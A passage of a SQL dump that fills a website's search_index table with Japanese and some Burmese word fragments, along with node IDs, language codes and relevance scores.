('အမြန်လာရောက်', 6, 'ko', 'node_search', 29),
('အမှတ်အပေါ်မူတည်ပြီး', 7, 'ko', 'node_search', 2),
('အမှာစကားများ', 9, 'ko', 'node_search', 3),
('အမှာစကားများပြောကြားပေးပြီး', 17, 'ko', 'node_search', 29),
('အလိုရှိသည်', 8, 'ko', 'node_search', 27),
('အလုပ်တွေရယ်', 7, 'ko', 'node_search', 2),
('အဲမှာလည်း', 7, 'ko', 'node_search', 2),
('၀င်ငွေခွန်', 8, 'ko', 'node_search', 2),
('၃၆၂၀၂၃', 17, 'ko', 'node_search', 1),
('၅နှစ်အထက်', 7, 'ko', 'node_search', 2),
('၅၀အထက်လောက်', 8, 'ko', 'node_search', 2),
('あたり', 5, 'ja', 'node_search', 1),
('あなた', 62, 'ja', 'node_search', 2.56007),
('あなた', 69, 'ja', 'node_search', 0.96498),
('あなた', 98, 'ja', 'node_search', 1),
('あなた', 120, 'ja', 'node_search', 1),
('ありが', 135, 'ja', 'node_search', 0.66666),
('ありま', 3, 'ja', 'node_search', 4.63896),
('ありま', 5, 'ja', 'node_search', 2.60032),
('ありま', 8, 'ja', 'node_search', 2),
('ありま', 18, 'ja', 'node_search', 1.9496),
('ありま', 30, 'ja', 'node_search', 1.81919),
('ありま', 98, 'ja', 'node_search', 1),
('ありま', 155, 'ja', 'node_search', 0.800068),
('ありま', 182, 'ja', 'node_search', 0.913226),
('ありま', 183, 'ja', 'node_search', 0.882818),
('ありま', 191, 'ja', 'node_search', 1),
('ありま', 196, 'ja', 'node_search', 0.892724),
('あるか', 87, 'ja', 'node_search', 0.643484),
('あると', 179, 'ja', 'node_search', 1),
('あるニ', 23, 'ja', 'node_search', 0.757065),
('ある従', 27, 'ja', 'node_search', 0.311334),
('ある必', 18, 'ja', 'node_search', 1),
('ある方', 18, 'ja', 'node_search', 0.989021),
('ある方', 155, 'ja', 'node_search', 0.716357),
('ある方', 163, 'ja', 'node_search', 1.326),
('ある潜', 138, 'ja', 'node_search', 0.691597),
('ある特', 144, 'ja', 'node_search', 1),
('ある経', 18, 'ja', 'node_search', 1),
('ある職', 188, 'ja', 'node_search', 0.931053),
('ある豊', 122, 'ja', 'node_search', 0.957226),
('あれば', 30, 'ja', 'node_search', 0.938382),
('いう強', 189, 'ja', 'node_search', 1),
('いう意', 3, 'ja', 'node_search', 0.896076),
('いう明', 87, 'ja', 'node_search', 0.695602),
('いう気', 189, 'ja', 'node_search', 1),
('いう目', 160, 'ja', 'node_search', 1),
('いう目', 166, 'ja', 'node_search', 1),
('いう目', 168, 'ja', 'node_search', 1),
('いう目', 170, 'ja', 'node_search', 1),
('いう目', 180, 'ja', 'node_search', 1),
('いう目', 186, 'ja', 'node_search', 1),
('いう目', 188, 'ja', 'node_search', 1),
('いう目', 190, 'ja', 'node_search', 0.993146),
('いう目', 191, 'ja', 'node_search', 1),
('いう目', 192, 'ja', 'node_search', 1),
('いう目', 196, 'ja', 'node_search', 1),
('いう目', 199, 'ja', 'node_search', 1),
('いかな', 87, 'ja', 'node_search', 0.66666),
('いがご', 1, 'ja', 'node_search', 1),
('いきま', 69, 'ja', 'node_search', 1),
('いこと', 98, 'ja', 'node_search', 1),
('いしま', 62, 'ja', 'node_search', 4),
('いする', 165, 'ja', 'node_search', 0.889397),
('いする', 195, 'ja', 'node_search', 0.886095),
('いたし', 27, 'ja', 'node_search', 0.31648),
('いたし', 154, 'ja', 'node_search', 1),
('いたし', 155, 'ja', 'node_search', 1),
('いたし', 156, 'ja', 'node_search', 1.93838);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('いたし', 157, 'ja', 'node_search', 1.83353),
('いたし', 160, 'ja', 'node_search', 1.83938),
('いたし', 161, 'ja', 'node_search', 1.8861),
('いたし', 162, 'ja', 'node_search', 1.64006),
('いたし', 163, 'ja', 'node_search', 0.661163),
('いたし', 164, 'ja', 'node_search', 1),
('いたし', 165, 'ja', 'node_search', 1),
('いたし', 166, 'ja', 'node_search', 1.86679),
('いたし', 167, 'ja', 'node_search', 1),
('いたし', 168, 'ja', 'node_search', 1.86995),
('いたし', 169, 'ja', 'node_search', 1),
('いたし', 170, 'ja', 'node_search', 1.87957),
('いたし', 171, 'ja', 'node_search', 1),
('いたし', 173, 'ja', 'node_search', 1),
('いたし', 174, 'ja', 'node_search', 1),
('いたし', 175, 'ja', 'node_search', 1),
('いたし', 176, 'ja', 'node_search', 1),
('いたし', 177, 'ja', 'node_search', 1),
('いたし', 178, 'ja', 'node_search', 1),
('いたし', 179, 'ja', 'node_search', 1.73614),
('いたし', 180, 'ja', 'node_search', 1.80007),
('いたし', 181, 'ja', 'node_search', 1.80275),
('いたし', 182, 'ja', 'node_search', 1),
('いたし', 183, 'ja', 'node_search', 1),
('いたし', 184, 'ja', 'node_search', 1),
('いたし', 185, 'ja', 'node_search', 1),
('いたし', 186, 'ja', 'node_search', 1.76922),
('いたし', 187, 'ja', 'node_search', 1),
('いたし', 188, 'ja', 'node_search', 1.76188),
('いたし', 189, 'ja', 'node_search', 1),
('いたし', 190, 'ja', 'node_search', 1),
('いたし', 191, 'ja', 'node_search', 1.80818),
('いたし', 192, 'ja', 'node_search', 1.77923),
('いたし', 193, 'ja', 'node_search', 1.79475),
('いたし', 194, 'ja', 'node_search', 1),
('いたし', 195, 'ja', 'node_search', 1),
('いたし', 196, 'ja', 'node_search', 1.7974),
('いたし', 197, 'ja', 'node_search', 1),
('いたし', 198, 'ja', 'node_search', 1.78178),
('いたし', 199, 'ja', 'node_search', 1),
('いただ', 1, 'ja', 'node_search', 2),
('いただ', 5, 'ja', 'node_search', 0.96498),
('いただ', 24, 'ja', 'node_search', 1),
('いただ', 27, 'ja', 'node_search', 1.20856),
('いただ', 135, 'ja', 'node_search', 0.670377),
('いた後', 8, 'ja', 'node_search', 2),
('いった', 24, 'ja', 'node_search', 0.348491),
('いてお', 3, 'ja', 'node_search', 2.86543),
('いてお', 24, 'ja', 'node_search', 0.927431),
('いてく', 62, 'ja', 'node_search', 0.49376),
('いてく', 69, 'ja', 'node_search', 0.906287),
('いてさ', 1, 'ja', 'node_search', 1),
('いての', 30, 'ja', 'node_search', 1.84234),
('いては', 155, 'ja', 'node_search', 0.681785),
('いては', 162, 'ja', 'node_search', 0.63333),
('いても', 24, 'ja', 'node_search', 0.418401),
('いても', 122, 'ja', 'node_search', 1),
('いても', 155, 'ja', 'node_search', 0.972861),
('いてシ', 5, 'ja', 'node_search', 28),
('いて日', 68, 'ja', 'node_search', 1),
('いて説', 29, 'ja', 'node_search', 3),
('いて道', 87, 'ja', 'node_search', 1),
('いて高', 162, 'ja', 'node_search', 0.869951),
('いでし', 3, 'ja', 'node_search', 1.50392),
('いです', 30, 'ja', 'node_search', 0.920273),
('いとい', 3, 'ja', 'node_search', 0.902857),
('いとい', 189, 'ja', 'node_search', 2),
('いに仕', 87, 'ja', 'node_search', 0.945829),
('いに期', 126, 'ja', 'node_search', 1),
('いに期', 180, 'ja', 'node_search', 0.909743),
('いに期', 186, 'ja', 'node_search', 0.942091),
('いに期', 188, 'ja', 'node_search', 0.866793),
('いのあ', 188, 'ja', 'node_search', 0.938382),
('いのは', 3, 'ja', 'node_search', 1),
('いまし', 1, 'ja', 'node_search', 1),
('いまし', 62, 'ja', 'node_search', 1),
('います', 1, 'ja', 'node_search', 1.93105),
('います', 5, 'ja', 'node_search', 4.60668),
('います', 7, 'ja', 'node_search', 1.8861),
('います', 8, 'ja', 'node_search', 2),
('います', 10, 'ja', 'node_search', 3),
('います', 18, 'ja', 'node_search', 3),
('います', 23, 'ja', 'node_search', 1.95661),
('います', 24, 'ja', 'node_search', 0.360701),
('います', 27, 'ja', 'node_search', 2.55501),
('います', 28, 'ja', 'node_search', 1),
('います', 30, 'ja', 'node_search', 3),
('います', 68, 'ja', 'node_search', 23),
('います', 69, 'ja', 'node_search', 2),
('います', 70, 'ja', 'node_search', 20),
('います', 71, 'ja', 'node_search', 2),
('います', 72, 'ja', 'node_search', 20),
('います', 73, 'ja', 'node_search', 20),
('います', 74, 'ja', 'node_search', 20),
('います', 75, 'ja', 'node_search', 47),
('います', 76, 'ja', 'node_search', 20),
('います', 77, 'ja', 'node_search', 23),
('います', 78, 'ja', 'node_search', 23),
('います', 80, 'ja', 'node_search', 26.9892),
('います', 81, 'ja', 'node_search', 23),
('います', 82, 'ja', 'node_search', 47),
('います', 83, 'ja', 'node_search', 1),
('います', 84, 'ja', 'node_search', 47),
('います', 85, 'ja', 'node_search', 23),
('います', 86, 'ja', 'node_search', 1),
('います', 88, 'ja', 'node_search', 1),
('います', 89, 'ja', 'node_search', 1),
('います', 90, 'ja', 'node_search', 47),
('います', 91, 'ja', 'node_search', 1),
('います', 92, 'ja', 'node_search', 1),
('います', 93, 'en', 'node_search', 2),
('います', 93, 'ja', 'node_search', 1),
('います', 96, 'ja', 'node_search', 20),
('います', 97, 'ja', 'node_search', 20),
('います', 99, 'ja', 'node_search', 20),
('います', 100, 'ja', 'node_search', 23),
('います', 101, 'ja', 'node_search', 20),
('います', 102, 'ja', 'node_search', 23),
('います', 103, 'ja', 'node_search', 20),
('います', 104, 'ja', 'node_search', 23),
('います', 105, 'ja', 'node_search', 1),
('います', 106, 'ja', 'node_search', 20),
('います', 107, 'ja', 'node_search', 20),
('います', 108, 'ja', 'node_search', 20),
('います', 109, 'ja', 'node_search', 23),
('います', 110, 'ja', 'node_search', 20),
('います', 111, 'ja', 'node_search', 20),
('います', 112, 'ja', 'node_search', 20),
('います', 113, 'ja', 'node_search', 2),
('います', 114, 'ja', 'node_search', 20),
('います', 115, 'ja', 'node_search', 20),
('います', 116, 'ja', 'node_search', 1),
('います', 117, 'ja', 'node_search', 20),
('います', 118, 'ja', 'node_search', 20),
('います', 119, 'ja', 'node_search', 20),
('います', 120, 'ja', 'node_search', 0.882818),
('います', 121, 'ja', 'node_search', 20),
('います', 123, 'ja', 'node_search', 20),
('います', 124, 'ja', 'node_search', 20),
('います', 125, 'ja', 'node_search', 20),
('います', 127, 'ja', 'node_search', 19),
('います', 128, 'ja', 'node_search', 19),
('います', 129, 'ja', 'node_search', 19),
('います', 130, 'ja', 'node_search', 19),
('います', 131, 'ja', 'node_search', 20),
('います', 132, 'ja', 'node_search', 20),
('います', 133, 'ja', 'node_search', 0.695602),
('います', 134, 'ja', 'node_search', 20),
('います', 135, 'ja', 'node_search', 3.06518),
('います', 136, 'ja', 'node_search', 1.64694),
('います', 137, 'ja', 'node_search', 20),
('います', 138, 'ja', 'node_search', 0.736141),
('います', 139, 'ja', 'node_search', 20),
('います', 140, 'ja', 'node_search', 1.77419),
('います', 141, 'ja', 'node_search', 20),
('います', 143, 'ja', 'node_search', 20),
('います', 144, 'ja', 'node_search', 20),
('います', 145, 'ja', 'node_search', 20),
('います', 146, 'ja', 'node_search', 20),
('います', 147, 'ja', 'node_search', 20),
('います', 148, 'ja', 'node_search', 20),
('います', 150, 'ja', 'node_search', 1),
('います', 151, 'ja', 'node_search', 20),
('います', 152, 'en', 'node_search', 20),
('います', 152, 'ja', 'node_search', 20),
('います', 153, 'ja', 'node_search', 20),
('います', 161, 'ja', 'node_search', 0.786915),
('います', 166, 'ja', 'node_search', 0.774192),
('います', 168, 'ja', 'node_search', 0.76188),
('います', 170, 'ja', 'node_search', 0.747619),
('います', 181, 'ja', 'node_search', 4),
('います', 182, 'ja', 'node_search', 0.816452),
('います', 183, 'ja', 'node_search', 0.752312),
('います', 187, 'ja', 'node_search', 1.61703),
('います', 190, 'ja', 'node_search', 0.771698),
('います', 194, 'ja', 'node_search', 0.754681),
('います', 197, 'ja', 'node_search', 0.771698),
('いもの', 165, 'ja', 'node_search', 0.839384),
('いもの', 166, 'ja', 'node_search', 0.827757),
('いもの', 178, 'ja', 'node_search', 0.882818),
('いもの', 185, 'ja', 'node_search', 0.779231),
('いもの', 187, 'ja', 'node_search', 0.805455),
('いもの', 199, 'ja', 'node_search', 0.786915),
('いやり', 162, 'ja', 'node_search', 0.670377),
('いやり', 189, 'ja', 'node_search', 1),
('いよう', 24, 'ja', 'node_search', 0.520204),
('いよう', 26, 'ja', 'node_search', 1),
('いりま', 154, 'ja', 'node_search', 0.78951),
('いりま', 160, 'ja', 'node_search', 0.752312),
('いりま', 161, 'ja', 'node_search', 0.808176),
('いりま', 164, 'ja', 'node_search', 0.754681),
('いりま', 165, 'ja', 'node_search', 0.752312),
('いりま', 167, 'ja', 'node_search', 0.819249),
('いりま', 173, 'ja', 'node_search', 0.76431),
('いりま', 174, 'ja', 'node_search', 0.725015),
('いりま', 175, 'ja', 'node_search', 0.771698),
('いりま', 176, 'ja', 'node_search', 0.742984),
('いりま', 179, 'ja', 'node_search', 0.808176),
('いりま', 186, 'ja', 'node_search', 0.839384),
('いるた', 140, 'ja', 'node_search', 0.854391),
('いるた', 142, 'ja', 'node_search', 0.863659),
('いると', 3, 'ja', 'node_search', 0.786915),
('いるサ', 1, 'ja', 'node_search', 1),
('いる介', 162, 'ja', 'node_search', 0.842342),
('いる候', 138, 'ja', 'node_search', 1),
('いる必', 18, 'ja', 'node_search', 0.953396),
('いる新', 142, 'ja', 'node_search', 1),
('いる方', 155, 'ja', 'node_search', 0.687638),
('いれば', 3, 'ja', 'node_search', 1),
('いをし', 87, 'ja', 'node_search', 0.873132),
('いキャ', 154, 'ja', 'node_search', 1),
('いキャ', 156, 'ja', 'node_search', 1),
('いキャ', 157, 'ja', 'node_search', 0.931053),
('いキャ', 166, 'ja', 'node_search', 0.854391),
('いトピ', 133, 'ja', 'node_search', 1),
('いネッ', 24, 'ja', 'node_search', 0.510357),
('いミャ', 24, 'ja', 'node_search', 1),
('い事が', 24, 'ja', 'node_search', 0.524706),
('い人た', 23, 'ja', 'node_search', 0.597248),
('い人の', 5, 'ja', 'node_search', 3),
('い人を', 8, 'ja', 'node_search', 2),
('い人材', 154, 'ja', 'node_search', 0.906287),
('い会社', 25, 'ja', 'node_search', 1),
('い会社', 26, 'ja', 'node_search', 1),
('い努力', 192, 'ja', 'node_search', 1),
('い励ま', 120, 'ja', 'node_search', 1),
('い合わ', 1, 'ja', 'node_search', 1),
('い合わ', 11, 'ja', 'node_search', 27),
('い合わ', 155, 'ja', 'node_search', 0.643484),
('い合わ', 162, 'ja', 'node_search', 0.621888),
('い合わ', 163, 'ja', 'node_search', 0.623497),
('い合格', 179, 'ja', 'node_search', 1),
('い場合', 3, 'ja', 'node_search', 0.51578),
('い娘が', 80, 'ja', 'node_search', 4),
('い学生', 24, 'ja', 'node_search', 0.563797),
('い息子', 87, 'ja', 'node_search', 0.585658),
('い意志', 186, 'ja', 'node_search', 1),
('い意志', 189, 'ja', 'node_search', 1),
('い意志', 192, 'ja', 'node_search', 1),
('い成果', 160, 'ja', 'node_search', 0.949597),
('い成果', 166, 'ja', 'node_search', 0.993146),
('い成果', 168, 'ja', 'node_search', 0.851346),
('い成果', 170, 'ja', 'node_search', 0.860547),
('い成果', 178, 'ja', 'node_search', 0.989021),
('い成果', 181, 'ja', 'node_search', 1),
('い成果', 182, 'ja', 'node_search', 1),
('い成果', 183, 'ja', 'node_search', 1),
('い成果', 195, 'ja', 'node_search', 0.916736),
('い成果', 198, 'ja', 'node_search', 0.873132),
('い挑戦', 187, 'ja', 'node_search', 0.824901),
('い挑戦', 196, 'ja', 'node_search', 1),
('い挑戦', 199, 'ja', 'node_search', 0.808176),
('い方で', 62, 'ja', 'node_search', 4),
('い方の', 24, 'ja', 'node_search', 0.394193),
('い方は', 28, 'ja', 'node_search', 3),
('い方を', 163, 'ja', 'node_search', 1),
('い未来', 167, 'ja', 'node_search', 0.945829),
('い未来', 174, 'ja', 'node_search', 0.931053),
('い未来', 192, 'ja', 'node_search', 0.797402),
('い機会', 111, 'ja', 'node_search', 1),
('い機会', 116, 'ja', 'node_search', 1),
('い機会', 164, 'ja', 'node_search', 0.976851),
('い機会', 171, 'ja', 'node_search', 0.98493),
('い機会', 177, 'ja', 'node_search', 0.980874),
('い物支', 162, 'ja', 'node_search', 0.747619),
('い環境', 169, 'ja', 'node_search', 0.972861),
('い生徒', 25, 'ja', 'node_search', 1),
('い生徒', 26, 'ja', 'node_search', 2),
('い生活', 171, 'ja', 'node_search', 0.913226),
('い生活', 175, 'ja', 'node_search', 0.980874),
('い生活', 177, 'ja', 'node_search', 0.909743),
('い申し', 154, 'ja', 'node_search', 1),
('い申し', 160, 'ja', 'node_search', 0.916736),
('い申し', 161, 'ja', 'node_search', 0.972861),
('い申し', 164, 'ja', 'node_search', 0.945829),
('い申し', 166, 'ja', 'node_search', 0.957226),
('い申し', 168, 'ja', 'node_search', 0.961087),
('い申し', 170, 'ja', 'node_search', 0.972861),
('い申し', 179, 'ja', 'node_search', 0.78951),
('い申し', 180, 'ja', 'node_search', 0.873132),
('い申し', 181, 'ja', 'node_search', 0.876337),
('い申し', 185, 'ja', 'node_search', 0.830633),
('い申し', 186, 'ja', 'node_search', 0.819249),
('い申し', 188, 'ja', 'node_search', 0.827757),
('い申し', 189, 'ja', 'node_search', 0.845322),
('い申し', 191, 'ja', 'node_search', 0.882818),
('い申し', 192, 'ja', 'node_search', 0.845322),
('い申し', 193, 'ja', 'node_search', 0.863659),
('い申し', 196, 'ja', 'node_search', 0.869951),
('い申し', 198, 'ja', 'node_search', 0.845322),
('い申し', 199, 'ja', 'node_search', 0.845322),
('い知識', 30, 'ja', 'node_search', 1.84234),
('い研修', 23, 'ja', 'node_search', 0.430926),
('い経験', 10, 'ja', 'node_search', 3),
('い経験', 174, 'ja', 'node_search', 0.819249),
('い結果', 194, 'ja', 'node_search', 0.920273),
('い結果', 197, 'ja', 'node_search', 0.913226),
('い職を', 3, 'ja', 'node_search', 0.60322),
('い職場', 167, 'ja', 'node_search', 1),
('い車を', 27, 'ja', 'node_search', 0.303747),
('い需要', 155, 'ja', 'node_search', 0.810915),
('うお仕', 162, 'ja', 'node_search', 0.899454),
('うこそ', 1, 'ja', 'node_search', 26),
('うこと', 87, 'ja', 'node_search', 0.993146),
('うござ', 68, 'ja', 'node_search', 23),
('うござ', 69, 'ja', 'node_search', 1),
('うござ', 70, 'ja', 'node_search', 20),
('うござ', 71, 'ja', 'node_search', 2),
('うござ', 72, 'ja', 'node_search', 20),
('うござ', 73, 'ja', 'node_search', 20),
('うござ', 74, 'ja', 'node_search', 20),
('うござ', 75, 'ja', 'node_search', 47),
('うござ', 76, 'ja', 'node_search', 20),
('うござ', 77, 'ja', 'node_search', 26),
('うござ', 78, 'ja', 'node_search', 23),
('うござ', 80, 'ja', 'node_search', 25.9892),
('うござ', 81, 'ja', 'node_search', 23),
('うござ', 82, 'ja', 'node_search', 47),
('うござ', 83, 'ja', 'node_search', 1),
('うござ', 84, 'ja', 'node_search', 47),
('うござ', 85, 'ja', 'node_search', 23),
('うござ', 86, 'ja', 'node_search', 1),
('うござ', 88, 'ja', 'node_search', 1),
('うござ', 89, 'ja', 'node_search', 1),
('うござ', 90, 'ja', 'node_search', 47),
('うござ', 91, 'ja', 'node_search', 1),
('うござ', 92, 'ja', 'node_search', 1),
('うござ', 93, 'en', 'node_search', 2),
('うござ', 93, 'ja', 'node_search', 1),
('うござ', 96, 'ja', 'node_search', 20),
('うござ', 97, 'ja', 'node_search', 20),
('うござ', 99, 'ja', 'node_search', 20),
('うござ', 100, 'ja', 'node_search', 23),
('うござ', 101, 'ja', 'node_search', 20),
('うござ', 102, 'ja', 'node_search', 23),
('うござ', 103, 'ja', 'node_search', 20),
('うござ', 104, 'ja', 'node_search', 29),
('うござ', 105, 'ja', 'node_search', 1),
('うござ', 106, 'ja', 'node_search', 20),
('うござ', 107, 'ja', 'node_search', 20),
('うござ', 108, 'ja', 'node_search', 20),
('うござ', 109, 'ja', 'node_search', 23),
('うござ', 110, 'ja', 'node_search', 20),
('うござ', 111, 'ja', 'node_search', 19),
('うござ', 112, 'ja', 'node_search', 20),
('うござ', 113, 'ja', 'node_search', 1),
('うござ', 114, 'ja', 'node_search', 20),
('うござ', 115, 'ja', 'node_search', 20),
('うござ', 117, 'ja', 'node_search', 20),
('うござ', 118, 'ja', 'node_search', 20),
('うござ', 119, 'ja', 'node_search', 20),
('うござ', 121, 'ja', 'node_search', 20),
('うござ', 123, 'ja', 'node_search', 20),
('うござ', 124, 'ja', 'node_search', 20),
('うござ', 125, 'ja', 'node_search', 20),
('うござ', 127, 'ja', 'node_search', 19),
('うござ', 128, 'ja', 'node_search', 19),
('うござ', 129, 'ja', 'node_search', 19),
('うござ', 130, 'ja', 'node_search', 19),
('うござ', 131, 'ja', 'node_search', 20),
('うござ', 132, 'ja', 'node_search', 20),
('うござ', 134, 'ja', 'node_search', 20),
('うござ', 135, 'ja', 'node_search', 0.659351),
('うござ', 137, 'ja', 'node_search', 20),
('うござ', 139, 'ja', 'node_search', 20),
('うござ', 140, 'ja', 'node_search', 1),
('うござ', 141, 'ja', 'node_search', 20),
('うござ', 143, 'ja', 'node_search', 20),
('うござ', 144, 'ja', 'node_search', 20),
('うござ', 145, 'ja', 'node_search', 20),
('うござ', 146, 'ja', 'node_search', 20),
('うござ', 147, 'ja', 'node_search', 20),
('うござ', 148, 'ja', 'node_search', 20),
('うござ', 151, 'ja', 'node_search', 20),
('うござ', 152, 'en', 'node_search', 20),
('うござ', 152, 'ja', 'node_search', 20),
('うござ', 153, 'ja', 'node_search', 20),
('うござ', 161, 'ja', 'node_search', 0.794753),
('うござ', 166, 'ja', 'node_search', 0.781775),
('うござ', 168, 'ja', 'node_search', 0.769219),
('うござ', 170, 'ja', 'node_search', 0.754681),
('うござ', 181, 'ja', 'node_search', 4),
('うござ', 182, 'ja', 'node_search', 0.824901),
('うござ', 183, 'ja', 'node_search', 0.759465),
('うござ', 187, 'ja', 'node_search', 0.747619),
('うござ', 190, 'ja', 'node_search', 0.779231),
('うござ', 194, 'ja', 'node_search', 0.76188),
('うござ', 197, 'ja', 'node_search', 0.779231),
('うな方', 155, 'ja', 'node_search', 0.776703),
('うな素', 156, 'ja', 'node_search', 1),
('うな素', 157, 'ja', 'node_search', 0.953396),
('うな良', 87, 'ja', 'node_search', 0.58995),
('うな資', 189, 'ja', 'node_search', 0.938382),
('うにし', 135, 'ja', 'node_search', 1),
('うに努', 87, 'ja', 'node_search', 1),
('うに扱', 77, 'ja', 'node_search', 4),
('うに扱', 87, 'ja', 'node_search', 0.636679),
('うに支', 23, 'ja', 'node_search', 0.472657),
('うに時', 24, 'ja', 'node_search', 0.517983),
('うに設', 140, 'ja', 'node_search', 0.876337),
('うまく', 69, 'ja', 'node_search', 1),
('うよう', 87, 'ja', 'node_search', 0.592848),
('う上司', 120, 'ja', 'node_search', 19),
('う個人', 27, 'ja', 'node_search', 0.338947),
('う十分', 87, 'ja', 'node_search', 0.736141),
('う強い', 189, 'ja', 'node_search', 1),
('う必要', 5, 'ja', 'node_search', 0.906287),
('う意欲', 3, 'ja', 'node_search', 0.892724),
('う明確', 87, 'ja', 'node_search', 0.693594),
('う気持', 189, 'ja', 'node_search', 1),
('う目標', 160, 'ja', 'node_search', 1),
('う目標', 166, 'ja', 'node_search', 1),
('う目標', 168, 'ja', 'node_search', 1),
('う目標', 170, 'ja', 'node_search', 1),
('う目標', 180, 'ja', 'node_search', 1),
('う目標', 186, 'ja', 'node_search', 1),
('う目標', 188, 'ja', 'node_search', 1),
('う目標', 190, 'ja', 'node_search', 0.989021),
('う目標', 191, 'ja', 'node_search', 0.997306),
('う目標', 192, 'ja', 'node_search', 1),
('う目標', 196, 'ja', 'node_search', 1),
('う目標', 199, 'ja', 'node_search', 1),
('えした', 3, 'ja', 'node_search', 1),
('えしま', 3, 'ja', 'node_search', 2.84843),
('えたい', 189, 'ja', 'node_search', 1),
('えてい', 28, 'ja', 'node_search', 1),
('えてお', 87, 'ja', 'node_search', 16),
('えてく', 87, 'ja', 'node_search', 0.668514),
('えてく', 133, 'ja', 'node_search', 0.876337),
('えとな', 154, 'ja', 'node_search', 0.934703),
('えに置', 87, 'ja', 'node_search', 0.677939),
('えまし', 87, 'ja', 'node_search', 0.766757),
('えられ', 7, 'ja', 'node_search', 1.8861),
('えられ', 9, 'ja', 'node_search', 3),
('えられ', 17, 'ja', 'node_search', 4),
('えられ', 184, 'ja', 'node_search', 1),
('えるそ', 24, 'ja', 'node_search', 1),
('える場', 3, 'ja', 'node_search', 0.674137),
('える大', 188, 'ja', 'node_search', 0.976851),
('える準', 120, 'ja', 'node_search', 1),
('える韓', 24, 'ja', 'node_search', 0.42866),
('えを捨', 87, 'ja', 'node_search', 0.722831),
('おいて', 87, 'ja', 'node_search', 1),
('おいて', 162, 'ja', 'node_search', 0.873132),
('おかげ', 120, 'ja', 'node_search', 1),
('おくべ', 87, 'ja', 'node_search', 1),
('おける', 27, 'ja', 'node_search', 0.4475),
('おける', 122, 'ja', 'node_search', 1),
('おける', 165, 'ja', 'node_search', 1),
('おける', 179, 'ja', 'node_search', 1),
('おすす', 155, 'ja', 'node_search', 0.766757),
('おめで', 68, 'ja', 'node_search', 23),
('おめで', 69, 'ja', 'node_search', 1),
('おめで', 70, 'ja', 'node_search', 20),
('おめで', 71, 'ja', 'node_search', 2),
('おめで', 72, 'ja', 'node_search', 20),
('おめで', 73, 'ja', 'node_search', 20),
('おめで', 74, 'ja', 'node_search', 20),
('おめで', 75, 'ja', 'node_search', 47),
('おめで', 76, 'ja', 'node_search', 23),
('おめで', 77, 'ja', 'node_search', 26),
('おめで', 78, 'ja', 'node_search', 23),
('おめで', 80, 'ja', 'node_search', 25.9892),
('おめで', 81, 'ja', 'node_search', 23),
('おめで', 82, 'ja', 'node_search', 47),
('おめで', 83, 'ja', 'node_search', 20),
('おめで', 84, 'ja', 'node_search', 47),
('おめで', 85, 'ja', 'node_search', 26),
('おめで', 86, 'ja', 'node_search', 2),
('おめで', 88, 'ja', 'node_search', 2),
('おめで', 89, 'ja', 'node_search', 20),
('おめで', 90, 'ja', 'node_search', 47),
('おめで', 91, 'ja', 'node_search', 20),
('おめで', 92, 'ja', 'node_search', 20),
('おめで', 93, 'en', 'node_search', 29),
('おめで', 93, 'ja', 'node_search', 20),
('おめで', 96, 'ja', 'node_search', 20),
('おめで', 97, 'ja', 'node_search', 20),
('おめで', 99, 'ja', 'node_search', 20),
('おめで', 100, 'ja', 'node_search', 23),
('おめで', 101, 'ja', 'node_search', 23),
('おめで', 102, 'ja', 'node_search', 23),
('おめで', 103, 'ja', 'node_search', 20),
('おめで', 104, 'ja', 'node_search', 29),
('おめで', 105, 'ja', 'node_search', 20),
('おめで', 106, 'ja', 'node_search', 20),
('おめで', 107, 'ja', 'node_search', 20),
('おめで', 108, 'ja', 'node_search', 20),
('おめで', 109, 'ja', 'node_search', 23),
('おめで', 110, 'ja', 'node_search', 20),
('おめで', 111, 'ja', 'node_search', 19),
('おめで', 112, 'ja', 'node_search', 20),
('おめで', 113, 'ja', 'node_search', 20),
('おめで', 114, 'ja', 'node_search', 20),
('おめで', 115, 'ja', 'node_search', 20),
('おめで', 117, 'ja', 'node_search', 20),
('おめで', 118, 'ja', 'node_search', 20),
('おめで', 119, 'ja', 'node_search', 20),
('おめで', 121, 'ja', 'node_search', 20),
('おめで', 123, 'ja', 'node_search', 20),
('おめで', 124, 'ja', 'node_search', 20),
('おめで', 125, 'ja', 'node_search', 20),
('おめで', 127, 'ja', 'node_search', 19),
('おめで', 128, 'ja', 'node_search', 19),
('おめで', 129, 'ja', 'node_search', 19),
('おめで', 130, 'ja', 'node_search', 19),
('おめで', 131, 'ja', 'node_search', 20),
('おめで', 132, 'ja', 'node_search', 20),
('おめで', 134, 'ja', 'node_search', 20),
('おめで', 137, 'ja', 'node_search', 20),
('おめで', 139, 'ja', 'node_search', 20),
('おめで', 140, 'ja', 'node_search', 1),
('おめで', 141, 'ja', 'node_search', 20),
('おめで', 143, 'ja', 'node_search', 20),
('おめで', 144, 'ja', 'node_search', 20),
('おめで', 145, 'ja', 'node_search', 20),
('おめで', 146, 'ja', 'node_search', 20),
('おめで', 147, 'ja', 'node_search', 20),
('おめで', 148, 'ja', 'node_search', 20),
('おめで', 151, 'ja', 'node_search', 20),
('おめで', 152, 'en', 'node_search', 20),
('おめで', 152, 'ja', 'node_search', 20),
('おめで', 153, 'ja', 'node_search', 20),
('おめで', 161, 'ja', 'node_search', 0.805455),
('おめで', 166, 'ja', 'node_search', 0.792123),
('おめで', 168, 'ja', 'node_search', 0.779231),
('おめで', 170, 'ja', 'node_search', 0.76431),
('おめで', 181, 'ja', 'node_search', 4),
('おめで', 182, 'ja', 'node_search', 0.836446),
('おめで', 183, 'ja', 'node_search', 0.769219),
('おめで', 187, 'ja', 'node_search', 0.757065),
('おめで', 190, 'ja', 'node_search', 0.78951),
('おめで', 194, 'ja', 'node_search', 0.771698),
('おめで', 197, 'ja', 'node_search', 0.78951),
('および', 27, 'ja', 'node_search', 1.53975),
('および', 62, 'ja', 'node_search', 31.5878),
('および', 162, 'ja', 'node_search', 1.77923),
('および', 163, 'ja', 'node_search', 0.934703),
('おりま', 23, 'ja', 'node_search', 0.648686),
('おりま', 24, 'ja', 'node_search', 3.56395),
('おりま', 26, 'ja', 'node_search', 2),
('おりま', 27, 'ja', 'node_search', 1.7039),
('おりま', 154, 'ja', 'node_search', 0.854391),
('おりま', 161, 'ja', 'node_search', 0.752312),
('おりま', 163, 'ja', 'node_search', 1),
('おりま', 164, 'ja', 'node_search', 0.819249),
('おりま', 165, 'ja', 'node_search', 0.808176),
('おりま', 166, 'ja', 'node_search', 0.797402),
('おりま', 167, 'ja', 'node_search', 0.889397),
('おりま', 168, 'ja', 'node_search', 0.784336),
('おりま', 169, 'ja', 'node_search', 0.863659),
('おりま', 170, 'ja', 'node_search', 0.769219),
